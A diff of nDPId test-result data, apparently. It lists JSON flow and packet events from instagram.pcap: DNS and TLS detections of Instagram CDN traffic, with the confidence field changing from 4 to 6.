00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1436720908579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908579,"pkt":"QPMIw47hABsv8H60CABFAADD9DAAADgRvNoICAgIwKgAZwA1Z6wAr0GdhbOBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAA3ACoQaWdjZG4tcGhvdG9zLWctYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFQ9ABYFYTEwMDcGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGiMBxAAEAAQAAABMABC4hRo4="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"} -00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"} -00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 